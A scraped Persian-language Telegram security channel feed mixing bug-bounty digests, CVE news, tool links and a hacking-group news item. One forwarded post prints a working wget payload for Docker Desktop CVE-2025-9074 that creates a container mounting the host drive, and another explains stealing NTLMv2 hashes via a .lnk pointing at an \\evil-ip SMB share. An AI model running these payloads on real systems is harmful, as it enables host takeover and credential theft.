وقتشه سطح آموزش رو ببریم بالا. اما شما کدومو می خواین؟
Anonymous Poll
53%
ساختن متدولوژی خودتون به عنوان پنتستر و هکر
20%
رود مپ Deep Osint
27%
بد افزار نویسی پیشرفته
❤5😭2🤔1
🔥 Red Team vs Bug Bounty: Clash or Collaboration?
⚡ 3-Min Quick Guide!
🔥 رد تیم یا باگ بانتی: رقابت یا همکاری؟
⚡ راهنمای سریع ۳ دقیقهای!
https://www.youtube.com/watch?v=fDeRAzU8IE0
از پیج یوتیوب ما حمایت کنید 💥
#RedTeam #BugBounty #Cybersecurity
⭐️ @ZeroSec_team
⚡ 3-Min Quick Guide!
🔥 رد تیم یا باگ بانتی: رقابت یا همکاری؟
⚡ راهنمای سریع ۳ دقیقهای!
https://www.youtube.com/watch?v=fDeRAzU8IE0
از پیج یوتیوب ما حمایت کنید 💥
#RedTeam #BugBounty #Cybersecurity
⭐️ @ZeroSec_team
YouTube
Hack Like a Pro: Bug Bounty vs Red Team Explained!
In this video, we dive into the world of cybersecurity and explore the key differences, overlaps, and similarities between Bug Bounty programs and Red Team operations. 🔒
What you'll learn:
✅ How Bug Bounty and Red Team approaches differ
✅ Skills and tools…
What you'll learn:
✅ How Bug Bounty and Red Team approaches differ
✅ Skills and tools…
🔥3❤1
RadvanSec
🔥 Red Team vs Bug Bounty: Clash or Collaboration? ⚡ 3-Min Quick Guide! 🔥 رد تیم یا باگ بانتی: رقابت یا همکاری؟ ⚡ راهنمای سریع ۳ دقیقهای! https://www.youtube.com/watch?v=fDeRAzU8IE0 از پیج یوتیوب ما حمایت کنید 💥 #RedTeam #BugBounty #Cybersecurity …
سلام دوستان عزیزم امیدوارم حالتون خوب باشه ;
هدف از پر کردن این ویدیو این بود که بهتون بگم تعصبات تو هر رشته ای میتونه چقدر رویکرد نادرستی باشه
سعی کنید هیچوقت تک بعدی فکر نکنید تا ذهنتون رو بسته نگه ندارید خیلی موقع ها هدف از گفتن اینکه outofbox فکر کنید همین هست که شما سعی کنید چالش هایی که پیش روی شما میاد رو از راه هایی که شاید به نظر خیلی براتون خنده دار میاد رو انجام بدید اگر این رویکرد رو داشته باشید حتما نتایج خوبی خواهید گرفت
بگذریم همونطور که گفتم هدف از این ویدیو این بود که بگم خیلی اوقات ما از تکنیک های Red Team میتونیم در Bug Bounty استفاده کنیم و یا حتی از تکنیک های Bug Bounty در فرایند Red Team پس هر دو حوزه در جهت اهداف مشترکشون که ارتقاء امنیت سایبری هست بهم کمک میکنند ! در کل زیاد سخت نگیرید سعی کنید در حوزه ای که فعالیت میکنید از هم یادبگیرید و بهم بیاموزید …
ممنونم که وقت گذاشتید🙏
Linkedin : https://www.linkedin.com/feed/update/urn:li:activity:7367186170457341952/
Youtube : https://www.youtube.com/@nexovir
Twitter : https://x.com/nexovir
⭐️ @ZeroSec_team
هدف از پر کردن این ویدیو این بود که بهتون بگم تعصبات تو هر رشته ای میتونه چقدر رویکرد نادرستی باشه
سعی کنید هیچوقت تک بعدی فکر نکنید تا ذهنتون رو بسته نگه ندارید خیلی موقع ها هدف از گفتن اینکه outofbox فکر کنید همین هست که شما سعی کنید چالش هایی که پیش روی شما میاد رو از راه هایی که شاید به نظر خیلی براتون خنده دار میاد رو انجام بدید اگر این رویکرد رو داشته باشید حتما نتایج خوبی خواهید گرفت
بگذریم همونطور که گفتم هدف از این ویدیو این بود که بگم خیلی اوقات ما از تکنیک های Red Team میتونیم در Bug Bounty استفاده کنیم و یا حتی از تکنیک های Bug Bounty در فرایند Red Team پس هر دو حوزه در جهت اهداف مشترکشون که ارتقاء امنیت سایبری هست بهم کمک میکنند ! در کل زیاد سخت نگیرید سعی کنید در حوزه ای که فعالیت میکنید از هم یادبگیرید و بهم بیاموزید …
ممنونم که وقت گذاشتید🙏
Linkedin : https://www.linkedin.com/feed/update/urn:li:activity:7367186170457341952/
Youtube : https://www.youtube.com/@nexovir
Twitter : https://x.com/nexovir
⭐️ @ZeroSec_team
Linkedin
Hack Like a Pro: Bug Bounty vs Red Team Explained! | Reza Mohamadzade
در هفته گذشته متوجه شدم به تازگی یک روندی در بین بچه های کامیونیتی امنیت فراگیر شده که باعث نزاع بین شاخه های امنیت شده در صورتیکه همه شاخه های امنیت باید یک هدف مشترک داشته باشند ارتقاء امنیت سایبری !
در یک ویدیوی کوتاه (۳ دقیقهای) به بررسی تفاوتها، شباهتها…
در یک ویدیوی کوتاه (۳ دقیقهای) به بررسی تفاوتها، شباهتها…
❤7
📊 Watcher Summary Report
🔹 BUGCROWD: 2 new items
🔹 HACKERONE: 116 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 2 new items
🔹 HACKERONE: 116 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤2
Forwarded from GO-TO CVE
CVE-2024-12877-week-66.pdf
1002 KB
🎯 CVE-2024-12877 Review – GiveWP goes unserialize()… Hello RCE! ⚡️🔥
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻
This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘
🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)
📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.
👾 What’s the impact?
Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️
💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.
📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE
#week_66
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻
This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘
🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)
📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.
👾 What’s the impact?
Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️
💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.
📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE
#week_66
❤7
شرکت اسرائیلیDream Security فعال در زمینه هوش مصنوعی (AI) گزارش داده که هکرهایی ایرانی به مذاکرات دیپلماتیک در قاهره نفوذ کردهاند و این مذاکرات که با حضور رسمیهایی از مصر، ایالات متحده و قطر در حال برگزاری بود، هدف یک حمله سایبری قرار گرفته است.
نقطه شروع: هکرها از حساب ایمیل واقعی یکی از کارکنان سفارت عمان در پاریس سوءاستفاده کردند و از آن حساب ایمیلهایی شبیه نامههای رسمی ارسال کردند.
گستره ارسال: این ایمیلها حدود ۲۰۰ دریافتکننده را هدف قرار دادند — از جمله مقامهای مصری حاضر در قاهره (و پاریس)، میانجیهای آمریکایی و قطری و برخی نهادهای بینالمللی.
ترفند فنی: متنها پیوستهای Word داشتند که در صورت باز شدن، بدافزار اجرا میکرد — تواناییهایی مانند خواندن مکاتبات، ضبط مکالمات/صداها و ارسال اطلاعات به سرورهای کنترل کننده (C2) را داشتند. هدفِ ظاهری عملیات جاسوسی و رصد مذاکرات بوده، نه لزوماً نابودی زیرساخت.
⭐️ @ZeroSec_team
نقطه شروع: هکرها از حساب ایمیل واقعی یکی از کارکنان سفارت عمان در پاریس سوءاستفاده کردند و از آن حساب ایمیلهایی شبیه نامههای رسمی ارسال کردند.
گستره ارسال: این ایمیلها حدود ۲۰۰ دریافتکننده را هدف قرار دادند — از جمله مقامهای مصری حاضر در قاهره (و پاریس)، میانجیهای آمریکایی و قطری و برخی نهادهای بینالمللی.
ترفند فنی: متنها پیوستهای Word داشتند که در صورت باز شدن، بدافزار اجرا میکرد — تواناییهایی مانند خواندن مکاتبات، ضبط مکالمات/صداها و ارسال اطلاعات به سرورهای کنترل کننده (C2) را داشتند. هدفِ ظاهری عملیات جاسوسی و رصد مذاکرات بوده، نه لزوماً نابودی زیرساخت.
⭐️ @ZeroSec_team
🔥5❤1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 16 new items
🔹 INTIGRITI: 5 new items
🔹 YESWEHACK: 1 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 16 new items
🔹 INTIGRITI: 5 new items
🔹 YESWEHACK: 1 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤3👍2
https://github.com/0xC01DF00D/Collabfiltrator
Exfiltrate blind Remote Code Execution and SQL injection output over DNS via Burp Collaborator
⭐️ @Zerosec_team
Exfiltrate blind Remote Code Execution and SQL injection output over DNS via Burp Collaborator
⭐️ @Zerosec_team
GitHub
GitHub - 0xC01DF00D/Collabfiltrator: Exfiltrate blind Remote Code Execution and SQL injection output over DNS via Burp Collaborator.
Exfiltrate blind Remote Code Execution and SQL injection output over DNS via Burp Collaborator. - 0xC01DF00D/Collabfiltrator
❤1
Forwarded from Xero Notes
🐋 آسیبپذیری CVE-2025-9074 در Docker Desktop
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
یک کانتینر جدید با دستور
📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
ttp://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم میتواند یک کانتینر جدید با دسترسیهای ویژه راهاندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم میکند.💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create
یک کانتینر جدید با دستور
echo pwned > /mnt/host_root/pwn.txt میسازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ میکند.📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
❤5🔥1
هکر معروف هک شد!
اخیرا یک گروه هکری موسوم به «گمنامان»، مدعی شد که به ایمیل های گروه هکری معروف «بکدور» دسترسی پیدا کرده است. بک دور عنوان یک گروه هکری است که از سال 1401 و در پی وقوع اغتشاشات، بروز و ظهور پیدا کرد. این گروه هکری که مدعی اخذ دسترسی به سامانه های سازمان ثبت احوال کشور شده بود با افشای اسناد سجلی، هویت برخی افراد در داخل کشور ازجمله برخی نیروهای فراجا را منتشر مینمود. این گروه هکری سپس انتشار اسناد هویتی برخی خبرنگاران مشهور صداوسیما را نیز در دستور کار خود قرار داد. این اقدام که به طور واضح با هدف اعمال فشار به این چهره های رسانه ای انجام میشد با استقبال ویژه ی شبکه ی ایران اینترنشنال مواجه شد و به سرعت اخبار آن در رسانه های معاند انتشار یافته و نام این گروه هکری نیز برسر زبان ها افتاد.
حالا یک گروه هکری موسوم به گمنامان ادعا نموده که ایمیل گروه هکری معروف بکدور را هک نموده و به اسنادی از ارتباط پنهانی میان این گروه هکری و عوامل شبکه اینترنشنال دسترسی پیدا نموده که نشان میدهد «بکدور» از طریق آنان با موساد در ارتباط بوده است.
جالب اینجاست که در سندی که گمنامان از ایمیل های بک دور منتشرنموده، مشاهده میشود که نریمان غریب(چهره رسانه ای همکار با اینترنشنال و نزدیک به موساد) ابتدا از طریق ارسال ایمیل، از بکدور خواسته است تا اطلاعات هویتی پدر و مادر خودش یعنی نریمان غریب را به او بدهد تا بتواند صحت عملکرد بکدور را راستی آزمایی کند. پس از اطمینان از دسترسی بکدور به ثبت احوال کشور، سپس نریمان غریب سفارش داده است تا اطلاعات دونفر از خبرنگاران مشهور صداوسیما را به وی بدهد. این اطلاعات پس از چندی دستمایه رسانه ای شبکه ایران اینرنشنال شد.
حالا گروه هکری گمنامان در آخرین پست خود با انتشار جمله «هکر بودن به معنای مصونیت نیست؛ دیر یا زود، سراغتان خواهیم آمد.»به گروه های هکری که با سرویس های اطلاعاتی دشمن همکاری میکنند هشدار داده است.
⭐️ @ZeroSec_team
اخیرا یک گروه هکری موسوم به «گمنامان»، مدعی شد که به ایمیل های گروه هکری معروف «بکدور» دسترسی پیدا کرده است. بک دور عنوان یک گروه هکری است که از سال 1401 و در پی وقوع اغتشاشات، بروز و ظهور پیدا کرد. این گروه هکری که مدعی اخذ دسترسی به سامانه های سازمان ثبت احوال کشور شده بود با افشای اسناد سجلی، هویت برخی افراد در داخل کشور ازجمله برخی نیروهای فراجا را منتشر مینمود. این گروه هکری سپس انتشار اسناد هویتی برخی خبرنگاران مشهور صداوسیما را نیز در دستور کار خود قرار داد. این اقدام که به طور واضح با هدف اعمال فشار به این چهره های رسانه ای انجام میشد با استقبال ویژه ی شبکه ی ایران اینترنشنال مواجه شد و به سرعت اخبار آن در رسانه های معاند انتشار یافته و نام این گروه هکری نیز برسر زبان ها افتاد.
حالا یک گروه هکری موسوم به گمنامان ادعا نموده که ایمیل گروه هکری معروف بکدور را هک نموده و به اسنادی از ارتباط پنهانی میان این گروه هکری و عوامل شبکه اینترنشنال دسترسی پیدا نموده که نشان میدهد «بکدور» از طریق آنان با موساد در ارتباط بوده است.
جالب اینجاست که در سندی که گمنامان از ایمیل های بک دور منتشرنموده، مشاهده میشود که نریمان غریب(چهره رسانه ای همکار با اینترنشنال و نزدیک به موساد) ابتدا از طریق ارسال ایمیل، از بکدور خواسته است تا اطلاعات هویتی پدر و مادر خودش یعنی نریمان غریب را به او بدهد تا بتواند صحت عملکرد بکدور را راستی آزمایی کند. پس از اطمینان از دسترسی بکدور به ثبت احوال کشور، سپس نریمان غریب سفارش داده است تا اطلاعات دونفر از خبرنگاران مشهور صداوسیما را به وی بدهد. این اطلاعات پس از چندی دستمایه رسانه ای شبکه ایران اینرنشنال شد.
حالا گروه هکری گمنامان در آخرین پست خود با انتشار جمله «هکر بودن به معنای مصونیت نیست؛ دیر یا زود، سراغتان خواهیم آمد.»به گروه های هکری که با سرویس های اطلاعاتی دشمن همکاری میکنند هشدار داده است.
⭐️ @ZeroSec_team
🔥11🤡4😁2👎1
🚨 آسیبپذیری Zero-Click جدید در ویندوز (CVE-2025-50154) 🚨
آسیبپذیری جدید به اسم CVE-2025-50154 کشف شده که پچ قبلی مایکروسافت (CVE-2025-24054) رو دور میزنه
این باگ به مهاجم اجازه میده بدون نیاز به کلیک کاربر (Zero-Click) هشهای NTLMv2 رو بدزده و حتی فایلهای اجرایی رو بیسروصدا دانلود کنه
چطور میشه ازش سوءاستفاده کرد
با یه فایل .lnk ساده که مسیرش به یه سرور SMB مخرب (مثل \\evil-ip\share\bad.exe) اشاره داره و آیکونش از shell32.dll محلی لود میشه میتونید Windows Explorer رو گول بزنید وقتی Explorer فایل رو رندر میکنه (مثلاً تو پوشه Downloads) یه درخواست SMB میفرسته و بوم! هش NTLMv2 کاربر لو میره تازه فایل اجرایی هم تو %TEMP% دانلود میشه
این هشها برای NTLM Relay (مثلاً به LDAP یا SMB برای Domain Takeover) یا کرک آفلاین با Hashcat عالیه میتونید با ترکیبش با CVE-2025-53770 (باگ SharePoint) به RCE برسید
کد اثبات مفهوم تو GitHub (rubenformation) هست با Responder یا Impacket یه سرور SMB راه بندازید و تو چند ثانیه هشها رو بگیرید. با Wireshark هم میتونید رفتار رو مانیتور کنید
لینک PoC
https://lnkd.in/d6w4Vk4p
🛡️برای عزیزان Blue Team: چطور جلوی این فاجعه رو بگیریم؟
ترافیک SMB خروجی رو با Zeek یا Suricata مانیتور کنید (دنبال NTLM Challenge/Response باشید) تو Event Viewer به Event ID 5145 نگاه کنید یا با EDR (مثل Defender یا CrowdStrike) رفتار مشکوک Explorer.exe رو رصد کنید
#امنیت_سایبری #ویندوز #آسیب_پذیری #Cybersecurity #RedTeam #BlueTeam #CVE_2025_50154 #NTLM #ZeroClick
⭐️ @ZeroSec_team
آسیبپذیری جدید به اسم CVE-2025-50154 کشف شده که پچ قبلی مایکروسافت (CVE-2025-24054) رو دور میزنه
این باگ به مهاجم اجازه میده بدون نیاز به کلیک کاربر (Zero-Click) هشهای NTLMv2 رو بدزده و حتی فایلهای اجرایی رو بیسروصدا دانلود کنه
چطور میشه ازش سوءاستفاده کرد
با یه فایل .lnk ساده که مسیرش به یه سرور SMB مخرب (مثل \\evil-ip\share\bad.exe) اشاره داره و آیکونش از shell32.dll محلی لود میشه میتونید Windows Explorer رو گول بزنید وقتی Explorer فایل رو رندر میکنه (مثلاً تو پوشه Downloads) یه درخواست SMB میفرسته و بوم! هش NTLMv2 کاربر لو میره تازه فایل اجرایی هم تو %TEMP% دانلود میشه
این هشها برای NTLM Relay (مثلاً به LDAP یا SMB برای Domain Takeover) یا کرک آفلاین با Hashcat عالیه میتونید با ترکیبش با CVE-2025-53770 (باگ SharePoint) به RCE برسید
کد اثبات مفهوم تو GitHub (rubenformation) هست با Responder یا Impacket یه سرور SMB راه بندازید و تو چند ثانیه هشها رو بگیرید. با Wireshark هم میتونید رفتار رو مانیتور کنید
لینک PoC
https://lnkd.in/d6w4Vk4p
🛡️برای عزیزان Blue Team: چطور جلوی این فاجعه رو بگیریم؟
ترافیک SMB خروجی رو با Zeek یا Suricata مانیتور کنید (دنبال NTLM Challenge/Response باشید) تو Event Viewer به Event ID 5145 نگاه کنید یا با EDR (مثل Defender یا CrowdStrike) رفتار مشکوک Explorer.exe رو رصد کنید
#امنیت_سایبری #ویندوز #آسیب_پذیری #Cybersecurity #RedTeam #BlueTeam #CVE_2025_50154 #NTLM #ZeroClick
⭐️ @ZeroSec_team
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
❤4❤🔥1
📊 Watcher Summary Report
🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 61 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 61 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤4
🚨 Open Redirect ؛ کوچک ولی دروازهای برای حملات بزرگ!
خیلیها وقتی اسم Open Redirect میاد سریع میگن:
"Low Impact ارزش توجه نداره"
ولی واقعیت اینه که همین باگ کوچیک می تونه راه ورود به حملات بزرگ تر و
باگ های بالاتر باشه و ایمپکت ضعفهای دیگه رو به شدت افزایش بده.
🔹 چه باگ هایی میشه با Open Redirect ایمپکتشون رو بالا برد؟
CSRF (Cross-Site Request Forgery)
با کمک Open Redirect میشه محدودیتهای SameSite رو دور زد و درخواست های حساس (POST/DELETE) رو از طرف کاربر فرستاد.
XSS (Cross-Site Scripting)
میشه مسیر ریدایرکت رو به صفحه مخرب یا کد جاوااسکریپت آلوده تغییر داد و اجراش کرد.
Broken Authentication / Session Hijacking
قربانی رو میشه به صفحات جعلی هدایت کرد تا Session یا رمز عبور رو لو بده.
Phishing / Social Engineering
Open Redirect امکان فریب کاربر برای ورود به صفحات جعلی و دزدیدن اطلاعات شخصی رو راحت میکنه.
Open-Redirect to Sensitive Endpoints
حتی میشه کاربران رو به صفحات مهم مثل reset password، payment confirmation یا صفحات ادمین هدایت کرد تا Exploit بیشتری انجام بشه.
Clickjacking Enhancement
با ترکیب Open Redirect و iframe میشه کاربران رو برای کلیک روی عناصر مخرب فریب داد.
Bypass Security Filters
بعضی فیلترهای URL یا WAFها رو میشه با Open Redirect دور زد و payloadهای مخرب رو وارد کرد.
⚡ نکته مهم:
Open Redirect به تنهایی شاید بیاهمیت باشه،
ولی وقتی باگهای دیگه مثل CSRF، XSS، Broken Auth یا حتی Clickjacking رو همراهش داشته باشی، خیلی راحت Impact از Low به High یا حتی Critical میره.
💡 درس امنیتی: هیچ باگی رو دست کم نگیر!
کوچکترین باگها میتونن به دروازهای برای حملات پیچیده و جدی تبدیل بشن.
⭐️ @ZeroSec_team
خیلیها وقتی اسم Open Redirect میاد سریع میگن:
"Low Impact ارزش توجه نداره"
ولی واقعیت اینه که همین باگ کوچیک می تونه راه ورود به حملات بزرگ تر و
باگ های بالاتر باشه و ایمپکت ضعفهای دیگه رو به شدت افزایش بده.
🔹 چه باگ هایی میشه با Open Redirect ایمپکتشون رو بالا برد؟
CSRF (Cross-Site Request Forgery)
با کمک Open Redirect میشه محدودیتهای SameSite رو دور زد و درخواست های حساس (POST/DELETE) رو از طرف کاربر فرستاد.
XSS (Cross-Site Scripting)
میشه مسیر ریدایرکت رو به صفحه مخرب یا کد جاوااسکریپت آلوده تغییر داد و اجراش کرد.
Broken Authentication / Session Hijacking
قربانی رو میشه به صفحات جعلی هدایت کرد تا Session یا رمز عبور رو لو بده.
Phishing / Social Engineering
Open Redirect امکان فریب کاربر برای ورود به صفحات جعلی و دزدیدن اطلاعات شخصی رو راحت میکنه.
Open-Redirect to Sensitive Endpoints
حتی میشه کاربران رو به صفحات مهم مثل reset password، payment confirmation یا صفحات ادمین هدایت کرد تا Exploit بیشتری انجام بشه.
Clickjacking Enhancement
با ترکیب Open Redirect و iframe میشه کاربران رو برای کلیک روی عناصر مخرب فریب داد.
Bypass Security Filters
بعضی فیلترهای URL یا WAFها رو میشه با Open Redirect دور زد و payloadهای مخرب رو وارد کرد.
⚡ نکته مهم:
Open Redirect به تنهایی شاید بیاهمیت باشه،
ولی وقتی باگهای دیگه مثل CSRF، XSS، Broken Auth یا حتی Clickjacking رو همراهش داشته باشی، خیلی راحت Impact از Low به High یا حتی Critical میره.
💡 درس امنیتی: هیچ باگی رو دست کم نگیر!
کوچکترین باگها میتونن به دروازهای برای حملات پیچیده و جدی تبدیل بشن.
⭐️ @ZeroSec_team
❤4
#WebApp_Security
1. Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover
https://zere.es/posts/cache-deception-cspt-account-takeover/
2. Smuggling Requests with Chunked Extensions: A New HTTP Desync Trick
https://www.imperva.com/blog/smuggling-requests-with-chunked-extensions-a-new-http-desync-trick
⭐️ @ZeroSec_team
1. Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover
https://zere.es/posts/cache-deception-cspt-account-takeover/
2. Smuggling Requests with Chunked Extensions: A New HTTP Desync Trick
https://www.imperva.com/blog/smuggling-requests-with-chunked-extensions-a-new-http-desync-trick
⭐️ @ZeroSec_team
Zere
Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover
Recently, while auditing the main application of a private bug bounty program, I discovered a Client-Side Path Traversal (CSPT) and a Cache Deception vulnerability. Individually, these issues were unexploitable and had no real impact. However, when chained…
🔥3👎1
Media is too big
VIEW IN TELEGRAM
Ryan Montgomery (0day) - #1 Ethical Hacker Who Hunts Child Predators Catches One Live On Podcast | SRS #56
⭐️ @ZeroSec_team
⭐️ @ZeroSec_team
❤4🔥1
Audio
Ryan Montgomery (0day) - #1 Ethical Hacker Who Hunts Child Predators Catches One Live On Podcast | SRS #56
⭐️ @ZeroSec_team
⭐️ @ZeroSec_team
👍2👏2
❤3👍1